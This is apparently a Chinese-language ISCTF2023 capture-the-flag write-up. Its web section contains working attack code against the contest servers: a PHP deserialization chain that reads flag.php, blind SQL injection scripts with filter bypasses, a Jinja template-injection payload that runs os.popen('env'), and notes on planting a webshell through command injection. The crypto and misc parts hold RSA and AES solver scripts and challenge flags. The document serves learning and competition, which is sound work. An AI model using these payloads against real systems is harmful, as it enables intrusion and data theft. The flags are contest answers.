ISCTF2023 部分wp

学一年了还在入门(

web

where_is_the_flag

ISCTF2023 部分wp_第1张图片

ISCTF2023 部分wp_第2张图片

ISCTF2023 部分wp_第3张图片

ISCTF{41631519-1c64-40f6-8dbb-27877a184e74}

圣杯战争


// highlight_file(__FILE__);
// error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!
"
; return $this->excalibuer->arrow; } } class prepare{ public $release; public function __get($key){ $functioin = $this->release; echo "蓄力!咖喱棒!!
"
; return $functioin(); } } class saber{ public $weapon; public function __invoke(){ echo "胜利!
"
; include($this->weapon); } } class summon{ public $Saber; public $Rider; public function __wakeup(){ echo "开始召唤从者!
"
; echo $this->Saber; } } $S = new summon(); $A = new artifact(); $P = new prepare(); $SABER = new saber(); $S -> Saber = $A; $A -> excalibuer = $P; $P -> release = $SABER; $SABER -> weapon = "php://filter/convert.base64-encode/resource=flag.php"; echo serialize($S);

ISCTF2023 部分wp_第4张图片

绕进你心里

考点 md5强碰撞 变异传参 数组绕intval 回溯绕正则

import requests

data = {
    'pan[gu': 'a'*1000000 + '2023ISCTF'
}

res = requests.post('http://43.249.195.138:20804?hongmeng=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&shennong=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&zhurong[]=1',
                    data=data, allow_redirects=False)
print(res.text)

easy_website

尝试admin admin登录 提示用户admin登录成功

那么应该是盲注

ISCTF2023 部分wp_第5张图片

注入点在username

部分关键字会被替换为空 用双写绕过

import requests
import string

dictionary = string.digits+string.ascii_letters+"-{,}"
url = "http://43.249.195.138:22469/check.php"
xxx = ""
for i in range(1, 666):
    print("正在爆破第{}位".format(i))
    for j in dictionary:
        flag = True

        # payload = "admin'anandd/**/substr(database(),{},1)=binary'{}'%23".format(i,j)
        # payload = "admin'anandd/**/substr(version(),{},1)=binary'{}'%23".format(i, j)
        # payload = "admin'anandd/**/substr((seleselectct/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/=/**/'users'),{},1)='{}'#".format(i, j)
        # payload = "admin'anandd/**/substr((seleselectct/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema/**/=/**/'users'),{},1)='{}'#".format(i, j)
        # payload = "admin'anandd/**/substr((seleselectct/**/group_concat(user)/**/from/**/users.users),{},1)='{}'#".format(i, j)
        payload = "admin'anandd/**/substr((seleselectct/**/group_concat(passwoorrd)/**/from/**/users),{},1)='{}'#".format(i, j)

        data = {'username': payload,"password":"admin"}
        res = requests.post(url=url, data=data)

        # print(res.text)
        # exit(0)
        if ('用户$admin$登录成功' in res.text):
            xxx += j
            print(xxx)
            flag = False
            break
    if (flag):
        print("final:\n{}".format(xxx))
        break


# users 库
# users 表
# uesr password
# admin,guest,flag
# 手动改大写

wafr

ISCTF2023 部分wp_第6张图片

ez_ini

ISCTF2023 部分wp_第7张图片

1z_Ssql

在robots.txt中存在here_is_a_sercet.php

其中存在waf的源码

ISCTF2023 部分wp_第8张图片

通过js目录下的rc4解密

const SM4 = require("gm-crypt").sm4;

var payload = "762V08zk+xrmKxIFrdJIJj6ULvI8Lc0pX39LjDyIUb0eAGkZe4KQa87TJXuqnFw0u/669wWRsqYFya812FtULw9+tpiGlaH2gleDfDKzr+g=";

let sm4Config = {
    key: "B6*40.2_C9#e4$E3",
    mode: "ecb",
    cipherType: "base64"
};
let sm4 = new  SM4(sm4Config);

var result = sm4.decrypt(payload);

console.log("解密:" + result)
/union|=|+|sleep|benchmark|for|where|sys|innodb|is|null|like|/*|*//i

万能密码拿到hint

ISCTF2023 部分wp_第9张图片

image-20231123233623536

没用

那就盲注

得到表为 bthcls

然后已知for sys innodb 都被ban了 一直在考虑怎么绕过

觉得题目给的secret.php后端waf可能是php写的 也尝试了回溯绕正则

失败

这时候想起来题目给了两个文本 应该分别对应的表和列

import requests
import string

dictionary = string.digits+string.ascii_letters+"-{,}"
url = "http://43.249.195.138:22431"
proxy = {"http":"127.0.0.1:8800"}


# def prove():
#     f1 = open("D:\Desktop\\blind_injection\some name1.txt", "r")
#     tables = f1.readlines()
#     f2 = open("D:\Desktop\\blind_injection\some name2.txt", "r")
#     columns = f2.readlines()
#     f1.close()
#     f2.close()
#     for table in tables:
#         for column in columns:
#             payload = "a'or ascii(substr((select group_concat({}) from {}),1,1)) > 0#".format(
#                 column.strip(), table.strip()).replace(" ", "	")
#             data = {'username': payload, "password": "a"}
#             res = requests.post(url=url, data=data)

#             if ('You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=' in res.text):
#                 print("{}{}".format(column,table))
#                 exit("found!")
# password users

xxx = ""
for i in range(1, 666):
    print("正在爆破第{}位".format(i))
    for j in dictionary:
        flag = True

        # payload = "a' or substr(database(),{},1) regexp '{}'#".format(
        #     i, j).replace(" ", "	")

        # payload = "a'or substr(version(),{},1) regexp '{}'#".format(
        #     i, j).replace(" ", "	")

        payload = "a'or substr((select group_concat(password) from users),{},1) regexp '{}'#".format(
            i, j).replace(" ", "	")
        data = {'username': payload, "password": "a"}
        res = requests.post(url=url, data=data)

        if ('You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=' in res.text):
            xxx += j
            print(xxx)
            flag = False
            break
    if (flag):
        print("final:\n{}".format(xxx))
        break

# prove()

# bthcls 库
# users 表
# password 列

然后登录

ISCTF2023 部分wp_第10张图片

webinclude

存在index.bak

ISCTF2023 部分wp_第11张图片

手测两位 猜测是mihoyo

ISCTF2023 部分wp_第12张图片

fuzz!

fuzz后发现保留了

[0-9a-zA-Z]- . / : { | } [ ]

| 保留了 所以可以命令注入

写个马ISCTF2023 部分wp_第13张图片

image-20231127234514199

这里的马要求b64后结尾无特殊符号 手动调一下马的格式就行

然后读文件

ISCTF2023 部分wp_第14张图片

恐怖G7人

{{url_for.__globals__.__builtins__['__import__']('os').popen('env').read()}}

没waf貌似

但是读了waf.py发现还是有黑名单的 不知道是不是没挂上

Crypto

你说爱我?尊嘟假嘟

注意到只有三个字符串

你说爱我

尊嘟

假嘟

给他替换成Ook. Ook! Ook?

解得

ild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z

ISCTF2023 部分wp_第15张图片

换表的b64 解码得ISCTF{9832h-s92hw-23u7w-2j8s0}

七七的欧拉

n 8185位

e 512位

p 1024位

尝试对n开根 发现是可以开完的image-20231122160423224

一直开8次都能开完

说明n = p^8

from Crypto.Util.number import *
import gmpy2



e=8401285423075497989963572888601376313375827722858883767564499066473101615084214973041844878664837606157257039358849583049856161628241418012475432529735909
n=4321524416983780646994834778612486851863709339970595612409550086067211224407144019110798099401660010305645681548980160563216101786447875231976835115531375372678886339587480251211072894186558627897353793098608766868067029578667171419890150599640781594755080391489447462042167529203389236065727274166091741227068469987681083794139925327545810024038937132463518225611578727737940746784891867532498184642892826569777559107609493212332054559366409007685504768163376250281644004067745087899653778023414105973047620041288118404657934689253192043728590231618132716567084621670074256312939305265244486145758609971249077639085204680923108132415216543541472534580414274250979940330459551536830268428508217821060604260805109071534457808355664329902779603050878055690772430842865701249378096775899778255848773171108341331128673249899037133851535556515961699925809139476576825524135111237249709241579903807179252011010794867269715170739895392375920757559721516050680666658719990497863646989338960261844762127142439486275294670858114079687572243312184222126710967744971775585723045524467708387051034760208768956889939050498139189352842087278125173957182804116052402778416216669522309692266036094371308166663738284209615212016564171075874421472070422416318901926525719485991792111414333398004433143751908199358861514725313334333703539239414806773743941986164981642517673117412666430463318509571757766510835600758060976848374353352239044908034501477295696684294816091801944163877509558909040753907584672390823893991672246726026216973013330313971007514064831801564703364591696610900089228302936595848024616691878437618798864186634802647568239526771151323609650598156701595265876736712670677452013054393336294483452480213271032488201259990782289047132105989846972462094302132564809025802421057537091870932014884606863807260521123084423689494401900014232257381801590783735595575258160274248494498550583673688754220860142413631521279464318987425447302135444093663034598455694901199312497459228254746451233078954904159983269585883146959928222698672413648364391121696092287848931565798557217897678221379451042304811449415982434055522599829843482810025780349284547491767219221510351411192251236517341826619338084348136539121415210345488359563985046136632077665460793346345051213014836088333266911684271237227766588616771431226302155269893547077232087387411935345207081799500649921586279416751311277417949192360648342427657867424947189027886922112452681434778850977010752230391327878892161
c=1319666577538961333645698288755316431847498788803191213042970951363587036899021668814931340784440773619019635330248746606532233949080268712626456845590851812018539646705520729734738948568349756255640832936325965096602018372418260009779997764653043892043725224481361578258532294625476542003357969893609762981355267857532927948279737945466285738730414948695579002627741734690862181161919734547857550654813379550806374778412603233570494684223057004866601064851006909940259029023083838730497564657690493780040030061594915385886594845808342023634855913932575150487723897981518504381563064479784253539091893925934095008385592529031453149337783826491324308222762190756839839091742536583068791632135883271750510776330897598323339568926234205068941397524390446254057404779041850572848212437589629794980799894974937730065394307284096622814438575278571743516485062058882794531407454597341604166586040406867868323002258035737328450923576878935675998377134860357842547595516243737449809845708319003744144753130977649201725370898918939022097783844477196723482879094829249203949784703408369396219233552019108990900029123063369670129291960293576115301371071209198455299007327352602249399500334424934488528506773472420414119617828578424633182320749576697196936762283306228974126242434663703609495003656244194067493769815032134577138807799395279843708630774412341952691146906264694889245375545635688534662371202213660012977431598746482601668122679279419039288257069843297770840263002870206849857995148396439717143553611140228607531647245352254251824086797704561756363448681983654454393569932173970943157225527780067126895832370645456372127507057750232257828579628856504832975775855059816283684123444984393171125206440588627925736223222718784319209561804023835238526792966229582251575475514349566824846911411659740321154272534589694497411065971714157409318007179403833025337349924938487211920583780456897879801099476865645416182025930390267064170271613760577949655548949317295792361772032185463678410983568470647837758657058230086368185901572658482084202212103405161775243930901117532775865963215971025744893777631306256061896284125630451368067313753222195227231131526000755922331413457862253392530308284156400411897252674398583100198330007779643967156773216464341590817951828849769679134515304258819218015083183653130972243262400248230445031327719507314015062447355358100770763425336581258193908638241498461735819218673116282476452340137513156421147748432605954889277898079292196216

p = (gmpy2.iroot(n,8)[0])

phi = p**7 * (p-1)
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,n)))

rsa_d

import gmpy2

p=86730239
q=14213789
e=65537
print(gmpy2.invert(e,(p-1)*(q-1)))

ISCTF2023 部分wp_第16张图片

easy_rsa

import gmpy2
from Crypto.Util.number import *

p=148918429211833931311377232986584938973743059073212599839623115665427914895645669183501178576150391744289581460816605746502214931778341477867351155596387652933495781711254282883751261939677404090197147081656181788591929669163136868218964709293920125621540609400422868787905644587832972557912408715930323376627
q=171038402266367256939123936702748804595437315282132849911066814500139712498763515340679622167260249888545143330007405802982392847190278920693250460850524633520975831749286968589871651025162017261096713799932261700764271950050347067565161191962564685771230794171949764436266574441764839874488376032231549892729
e=65537
c=14851493117751729314786395590288851716359993587230817853630888106953736856046237283262458768943755928276114968455892230282415271874575102191848094467483072917406023563216365448317356224168547471575514703164457734782926340881270452909703833791596549989295859769700115957204387979364759151189412041661372232990709426700356130619157951306602124832829643934472455951505172648145342937402994245253247196676517368660145618930947580047826592385805422897667170848124234255930751616877489527111466935276096332430156997438276378838842292858233866402475094148461288467628876155587524351026609368358477501337216881543486822532627

d = gmpy2.invert(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,q*p)))

夹里夹气

嘤嘤?换.

嘤嘤嘤 换-

解码摩斯

ISCTF2023 部分wp_第17张图片

ezRSA(τ)

这题考信息收集(

参考

https://r98inver.github.io/posts/teamitaly-bigrsa/

https://7rocky.github.io/en/ctf/imaginaryctf/pqqp/

https://blog.maple3142.net/2023/10/09/balsn-ctf-2023-writeups/#prime

https://7rocky.github.io/en/ctf/other/balsn-ctf/prime/#

生成相关素数

rs = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
P = prod(rs)
res = []
for k in range(2,2**6):
	a = 6 * k + 1
	b = 12 * k + 1
	c = 18 * k + 1

	if is_pseudoprime(a) and is_pseudoprime(b) and is_pseudoprime(c):
		n = a * b * c
		res.append(n)
print(res)
from Crypto.Util.number import *
from sympy import factorial
from gmpy2 import gcd
import gmpy2

n = 11947241219140615237486309604628973391930339499486798714294498785973885463922548820705069266901903036359254530976927762175262118185159625298369758973935607721381080656199430417818042316007700805008489750740972102287526203064312544340176751751266738219862839022892152635044837041435349904947659346174437695051460882295109851494351994498403791853684239883961766735230202016890875913906900424655711952381425165331389205409282026144667620577946333963601349932905443037145145394667138672752796990411249984169798953060016353748467221154507518574580014882822860853751863757579945329482337792853278715658322366578632817369803
leak = 4825516411405566882589539973300777582630401687252523937619475044718073214792109569356301252345907914527064817796240727881691399437316660502564323688151311441558823720142071322647007043253626474853010585775710666373651910201889816367922377400970334479040370865879692204764210349607801862666059991789964453439198722962928173197103040385999540054988070333338229570681105393323319767364566644771731595597298210924296456293443125736685469259629163687986114207231233692023613120260155832741199446052855856512791809968963821161765216500389495853488545132008219841635172896843241988125093920217328861507191614658581776695350233593334984646128341640512614300048002219790302478025661133721688232990437685571940604588227022076092857294647830142309441330515812342199940466483115991318018705011472671758063610572930560763516803732693572940939851140384123593105367117155740563057395940645038058194280259524467405820813428765139386968927021061208348111646257434870000866555555283176852834141906387086839051793789126474095527358879630274092172435022326207193319806666865704778907868548658370890623182731938070419969709739233504224100413506514936517272134494776127809327563935813198793891897000404156963455000732616317276241867836699641699825594195079194154957636030485909612033254350828892222046169586844737908349421869385194421981553067305581842171364022745759111602699744161574724372962242132415149146766136601016174658042678857388889036814591399168640678928083442174651493660991088328784105160030857387096251561933704301600695757426945716557961698202485226605485682131045560193822624290720243852434254301324766198129736640005205530445739302632191151740246117208267182630330046600955724262084795763080838384593939971523865769318326101179866187596006185138294477350533316908592086441208575935282494961976691089358976722199557082176285926812134290542838960814502829473372780200310674359645482281037654052483716329497333729594792122297988611883754886634452292313599416610842690057657285337854049766320641249317238780428383587602425132767334811708075065922641191109650660427678019567095309270443930385437292172296652003394183918270707887845018685247162812541929998945735270109736669595830167257239265204520272132384023622231518288514767919183916561550558812478144292894132331163501566746036390319663066054892756826660841952717280005731719082266616429646501565960817772663658546555336959754321712751857740551378987853931613973604348308746819562341219749677392565068390386908064199536445684309718116754288299091975226013592388160308117145043236992250577771659408413506586402897189336742792418163003231783947003853396754144599319566763313339145462208172531322682800226151072022731913191728047323245146556315571396082728252085753230639541374982105041248659074695696205654079837224195868428271353983820725017250413714060967825638577327604252122887136259380946072629481202720339169708229866846597577227829317443910036825722430374711816074735238082313198164126791797947010044130222158124667234003098164746100341636238823175289796896896408971518797835906067939914494546110471749352544064300485882179448030898818405400902242119590645639910708635188342567159795613212660990908765619684401061336405049960091659288716162966504703741105477420409053115823924764680153604215949521605456710353305498258615912458036292507652321420277318757146737030628878096962452278346772976364597137682209395761868224382621093921689415088745975049380393255899867417274843474628482169247388041616142896804170033688742622605192409970919836724035274730923747265191248135577704760607590
c = 4058526944014006069084945174812818814825704864122299028618329411106188952604728150732223145114766938864644072527523082946069975859381918224872075058517683896020489424720005770218969436595364473179601299857281520204212872074837132357469599147175121200219338329188718982224238281009625352190581095607599976922610436817213692622671732783554216636941121695116377777616027462234472833366922829073660312229117800995468022619934881890343086653577149166193139948443894324239522101581089953817527886638425552917578146958961373353776642091545344162923084513872918786615317499139918810812014781753970806739855831453833956364967


def factor(n, t):
    for _ in range(10):
        for b in range(1, 100, 2):
            num = pow(b, t, n)
            if gcd(num-1, n) not in [1, n]:
                return gcd(num-1, n)
    return False

def get_k_y():
    y = 0
    for k in range(800, 1500):
        fact = factorial(k)

        y_ed = (leak - k) // fact
        y = gcd(int(y_ed), int(leak - k))
        if y > (1 << 100) and y.bit_length() <= 1280:
            print(f'{k = } {y = }')
            break
    return k,y

k,y = get_k_y()

# e = gmpy2.iroot(int(((leak-k)//y) % factorial(k)), 2)[0]
# tem = int((leak-k)//y)
# kphi = (tem-e**2) // factorial(k)
# phi_ = kphi
# while phi_ % 2 == 0:
#     phi_ = phi_//2
#     p = factor(int(n), int(phi_))
#     if p:
#         print('found!')
#         print(p)
#         break
# 109147047401610068589196117668478678573425640467855721459792193588022086523216277422282084972626038309107642247231426126118154349890627263786908440994518759632567543350240699529434894837492043098560661823088926312187833910086403576147831906252128915891099450787538630572210256420615161408120096393238146759283
p = 109147047401610068589196117668478678573425640467855721459792193588022086523216277422282084972626038309107642247231426126118154349890627263786908440994518759632567543350240699529434894837492043098560661823088926312187833910086403576147831906252128915891099450787538630572210256420615161408120096393238146759283
q = n // p
phi = (p-1)*(q-1)
e = 65537
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,n)).decode(),end="")


from sympy import *
from functools import reduce
from Crypto.Util.number import *
import gmpy2
from gmpy2 import is_prime as is_strongPrime


n=138222025039224144545251830624229986468723531196582463907557734108529994926504669875900898789473948111199016914847829105939167293515822413866727879262875702026534563930475309506834431656926222982363543666448736091756871792887144283877167509418070979449484508499296324616988840431116233637168977730122017878289
leak1=23535059927033628406212169278224758389583882623183004031205822980722154537430761635153622180505243837027568034322858038302626132200979370182327110682738910
leak2 = [362437850887271063413256292444148642949623196635276044583204094265607936120337004605360832421011, 1932915843524327487337992118762711929552569713433223514001673251237692307587356544615955431611435994003602897830069566867051943572065473955405337889221398, 11222178024143398739150445814520244630341642052876364179793404105841311693968292227072031763726153574031884490677131749512430325919668649359617953965112844, 5408933876805830533113961512210040977462510675785228477646978801328722923647434079128879371684477664804744431834418916837956820965870203842552250165916773, 1447143741705069323823257922715038721270982554690635708441585728089036094805730054505696492295730683300002193478561819037345041940787115528445592303142510, 3707657531268843465369646969917923274507341341483950204025637357600814449263032574496424566705812439915548150679438579110456264431525526309588664326456861, 9263925820149827740182684692442727161206242182976684575667062235695526783971703826794731732152445051579616121306722939129265340347908823003172137299057843, 207494591333501391015462321304802957885928775185602834554977737560856036337667840127810136802887548047878444936730742505483927963807357904024967768148122, 7052936859446617933917872361389151092893299250603966165472023802877016733939957851026719428770748111897050866474067880613419756475700748999497496482278608, 1169538791889404037461397919075674424569430764451305755000680272926397357803359328850780774937432248011264334398346178303234064891680342161511829008635621]
final = [2268617516274900905319941795987877533673889507146326516564545408684476960310333170888941124460992562245780101836116975666368936099249664924148379487909122, 1445275952377746701088629016221431744592935398639655895336779954310077866709012082302847692239730041591520169244063854849129773530127510048494782550102381, 7]
phi = n - (leak1%n) + 1
e = 0x10001
d = gmpy2.invert(e, phi)


def is_prime(p):
	check = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37,
          41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
	return all([pow(i, p-1, p) == 1 for i in check])

def cal_key():
    for key in range(10**9, 2,-1):
        if (is_prime(key) and not is_strongPrime(key)):
            print(key)
            return key

def crack_unknown_increment(states, modulus, multiplier):
    increment = (states[1] - states[0]*multiplier) % modulus
    return modulus, multiplier, increment


def crack_unknown_multiplier(states, modulus):
    multiplier = (states[2] - states[1]) * \
        inverse(states[1] - states[0], modulus) % modulus
    return crack_unknown_increment(states, modulus, multiplier)


def crack_unknown_modulus(states):
    diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])]
    zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
    modulus = abs(reduce(gcd, zeroes))
    factors = factorint(modulus)
    while not isprime(modulus):  # 注意这里N刚开始有可能不是素数导致后面无法求出逆元
        for prime, order in factors.items():
            if prime.bit_length() > 128:
                continue
            modulus = modulus / prime**order
    multiplier = (states[2] - states[1]) * \
        inverse(states[1] - states[0], modulus) % modulus
    increment = (states[1] - states[0]*multiplier) % modulus
    seed = ((states[0] - increment) * invert(multiplier, modulus) % modulus)
    return modulus, multiplier, increment, seed

modulus, multiplier, increment, seed = crack_unknown_modulus(leak2)
for i in range(11):
    seed = (seed * multiplier + increment) % modulus

for key in [294409, 56052361, 118901521, 172947529, 216821881, 228842209]:
    base = seed ^ key
    c = 0
    times = 0
    for i in final:
        c += i * base ** times
        times += 1
        res = long_to_bytes(pow(c, d, n))
        try:
            print(res.decode())
        except:
            pass

signin

import gmpy2
from Crypto.Util.number import *

c = 29897791365314067508830838449733707533227957127276785142837008063510003132596050393885548439564070678838696563164574990811756434599732001622138564176327233154381380717648392357672642893142367607369679906940371540867456654151408884171467638060523066406441697453971996011548195499549200103123841556085936672833238264876038160712793697159776332101536779874757463509294968879216810485825310481778472384531442206034564488532399171243463881900578407746982324779260941957792455217641883334131366614310644607114128868153897806362954456585661855569432513785225453501792356175649676419772626548071916379318631677869452985829916084336045071072493567871623113923140668031380684940109024609167449291380675124701557542736834722898328082888430566229322840781411336263268594978558564310744076581639469210462567543585251718744340216155557606004995449505782302864725856877289388008819135023371948017425832082773421030256964953984562211638060
N = 3231913372897424708803097969843687520868057190788284975066875241636436021279559026753076528399891936983240045179193386905918743759145596242896507856007669217275515235051689758768735530529408948098860529277921046146065473333357110158008648799207873976745048714516868561754202543130629713461365314627535982379718931633528922076268531363809414255082933615667770491818402126891370106045838695484124212397783571579791558324350069782623908757815983802849109451590357380624488436968737140312471089662428308113246310588336044438265822574558816510054763215983649467009345458480077882624118620789015758507736272402998721366662352794082495441303895025585316667229865533166614969641012195668280586477033200418153345241668242651407009849656745509386158276185301334443855737552801531617549980843398648751032649895403939319648954908487619711555700124294191702406981128355348449748466449951568451135718146828444185238617155432417897711198169
d = 220908195398117048628110042133057032501548264225985823161565460390793825899523662424732910718579350524590368287207857059670558852106434615134645183432670023784725430385048028248108677670095524205518013647694485975996499747580966911259433184798952372110628624294686853944766950244209186984164963987120416687012811346656498861438432610431705868541829977481875385468143747334359481673214618931159403123892213161430602430294790913847722073762999311674428134241956293914716183107414340330449465142849402354034926378025006749405210014879947411570380433942279355488861684317611066949685697268714760755591128598654573304969


pq = gmpy2.gcd(pow(2, d*N, N)-2, N)

m = pow(c, d, pq)
print(long_to_bytes(m))

1zrsa

p1 p2 接近

连分数逼近得到q1 q2

from Crypto.Util.number import *
import gmpy2


c = 10514867898770499427284608506159580569755258729683776720082395249877529851029152305989048383470182992945743997295638334301128554841767619528809377736651238576700664675871769469687466885347209033023021132575700436470105289467423655742323143373578268184141573237433927498143740155552829633601489926767185335051352605346248971754473960051955670785777007641909166041398566067524811394639822575661469340152913706417365065683835945980239268665146900957692685590242386540944646586739158427428484471978559453954674292300496568823382513505511940062159025700312492163454304120916055466108498000990408937265075788135466153131436
N1 = 29306627985861300819651846356448043523015086509329909246911330574896611830331438353458702041787309531570626136669100576501108581024502570212983369979387658041578384466200573362881060761873478590684611265249166591510948597798713864127744488747451815919677861684787135464097885906630772472111899455047125676738720391327331161464894360886214160668909531050207033060523194208723151015702926842472554933849380343375654696115359960495727909221926251630408376527033291123026893207722440649867394971680316008434251667567174806214522621693042164997381729300075394393372808917061813346794422821819494227772694592990703688149467
N2 = 18405525902524887428651801489049128242565457677879715229456940729064725933277139190670749899959483734341103740185991771024797037242681566772189045321838652668819112989587974866361063424698215713773139281840970499871668796770682692589505769008516630604297570518689639885716307469568821629424402742264467677407820449195383921766157185602677665872353099155904715047452319853202981674101731121033360393547940246101864940155160699277417096395998766928213545196492031975135121409309520198853066288180944871441224241681478164494169741263236267316380581883196836731872676312125837497320438964940186318916950049777255612191899
e = 65537




def continuedFra(x, y):
    cF = []
    while y:
        cF += [x // y]
        x, y = y, x % y
    return cF


def Simplify(ctnf):
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator)


def getit(c):
    cf = []
    for i in range(1, len(c)):
        cf.append(Simplify(c[:i]))
    return cf


def attack(e, n):
    cf = continuedFra(e, n)
    for (p2, p1) in getit(cf):
        if p1 == 0:
            continue
        if N1 % p1 == 0 and p1 != 1:
            return p1, p2
    print('not find!')


q1, q2 = attack(N1, N2)
p1 = N1 // q1

print(GCD(N1,p1))
d = gmpy2.invert(e,(p1-1)*(q1-1))
print(long_to_bytes(pow(c,d,N1)))

ezAES

from Crypto.Util.number import *
from Crypto.Cipher import AES
import os



c = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'
hint = 0x47405a4847405a48470000021a0f2870

# padding  9 个 tab + 已知明文 ISCTF{ 6个 爆破剩余一个 得到key
# b'\t\t\t\t\t\t\t\t\tp047405a48asdeqa48470000021a0f287098asn'

m = b'\t\t\t\t\t\t\t\t\tISCTF{'
i = 1
tem = m + chr(i).encode()
res = bytes_to_long(tem) ^ (hint)
message = long_to_bytes(res)

# 通过观察特征猜测最后一位也为A
# NISANISANISANISA
key = b'NISANISANISANISA'


cipher = AES.new(key, AES.MODE_ECB)
iv = os.urandom(16)

aes = AES.new(key, AES.MODE_CBC, iv=iv)
res = aes.decrypt(c)
print(res)
# b106cea3fb848e7bea310c9851f15c1}
# ISCTF{
# 拼接起来还差一位 爆破一下就行

misc

小猫

foremost抽出第二张猫

没啥用stegsolver发现里面还有张图

ISCTF2023 部分wp_第18张图片

是社会主义核心价值观

结合原图左上角的坐标

ISCTF2023 部分wp_第19张图片

查表即可

ISCTF2023 部分wp_第20张图片

table = [["富强","自由","爱国"],["民主","平等","敬业"],["文明","公正","诚信"],["和谐","法治","友善"]]
print(len(table))
points = [(3, 2), (3, 2), (3, 2), (3, 3), (3, 1), (3, 2), (2, 1), 
          (3, 2), (4, 2), (4, 2), (3, 3), (2, 1), (3, 2), (2, 1), 
          (3, 2), (4, 1), (3, 2), (2, 1), (4, 1), (2, 1), (4, 1), 
          (2, 3), (4, 1), (2, 2), (3, 2), (3, 2), (3, 2), (1, 2), 
          (4, 1), (4, 1), (3, 2), (1, 2), (4, 1), (1, 1), (3, 2), 
          (3, 2), (4, 1), (3, 1), (4, 1), (4, 1), (4, 1), (2, 3), 
          (4, 1), (3, 1), (4, 1), (2, 2), (4, 1), (1, 2), (4, 1), 
          (1, 3), (3, 2), (1, 2), (4, 1), (1, 1), (4, 1), (3, 1), 
          (4, 1), (2, 3), (4, 1), (4, 2), (4, 1), (3, 2), (4, 1), 
          (4, 2), (3, 2), (1, 2), (3, 2), (3, 1), (3, 2), (3, 2), 
          (4, 1), (4, 2), (4, 1), (3, 2), (4, 1), (3, 2), (4, 2), 
          (4, 3), (4, 2)]
res = ''
for point in points:
    x,y = point
    res += table[x-1][y-1]

print(res)

一心不可二用

反编译后jadx打开 发现是unity小游戏

在manage下没有找到assembly-csharp.dll

于是去lib下找libil2cpp.so

通过Il2CppDumper导出

ISCTF2023 部分wp_第21张图片

ISCTF2023 部分wp_第22张图片

再执行 srcipt file -> ida_py3.py -> script.json 进行函数关联

然后就没然后了 这不是逆向

回过头用010看看apk 搜flag

ISCTF2023 部分wp_第23张图片

发现flag.zip的路径

我们找到并查看ISCTF2023 部分wp_第24张图片

考虑到下面的报错

是语法错误 猜测密码是SyntaxError

得到flag

杰伦可是流量明星

binwalk 抽出pcap包

发现访问了login.jsp

追踪tcp流ISCTF2023 部分wp_第25张图片

解码得到flag

ISCTF2023 部分wp_第26张图片

提交记得换前缀

小黑小白

复制进记事本 改字体大小为1发现类似二维码

然后复制颜色较深处数据 发现都是45678 那么将其替换为1 其余替换为0

然后转码扫码

with open("data.txt","r")as f:
    data = f.read().replace("4","a").replace("5","a").replace("6","a").replace("7","a").replace("8","a")\
    .replace("9","0").replace("0","0").replace("1","0").replace("2","0").replace("3","0").replace("a","1")
    with open("res.txt","w")as f2:
        f2.write(data)

小蓝鲨的秘密

伪加密

!ISCTF2023 部分wp_第27张图片

crc爆破宽高

ISCTF2023 部分wp_第28张图片

flag.txt中的文件像aes rabbit这种的特征

解压得到密码

解aes得到flag

easy_zip

ISCTF2023 部分wp_第29张图片

蓝鲨的福利

补png头

ISCTF2023 部分wp_第30张图片

ISCTF2023 部分wp_第31张图片

Ez_misc

ISCTF2023 部分wp_第32张图片

补文件头尾

ISCTF2023 部分wp_第33张图片

然后扫码

ezusb

tshark -r usb.pcapng -T fields -Y "bluetooth" -e btatt.value | sed '/^\s*$/d' > blue.txt

tshark读取蓝牙流量得到blue.txt,手动删除多余的01,03字符

knm提取usb流量得到usbdata.txt

ISCTF2023 部分wp_第34张图片

脚本去除多余字符

usbdata = open(r"C:\Users\abc\Desktop\usbdata.txt",'r').read().split('\n')
for i in range(len(usbdata)):
    data = usbdata[i][2:18]
    print(data)

结果和blue.txt手动拼接

键盘流量脚本得到明文

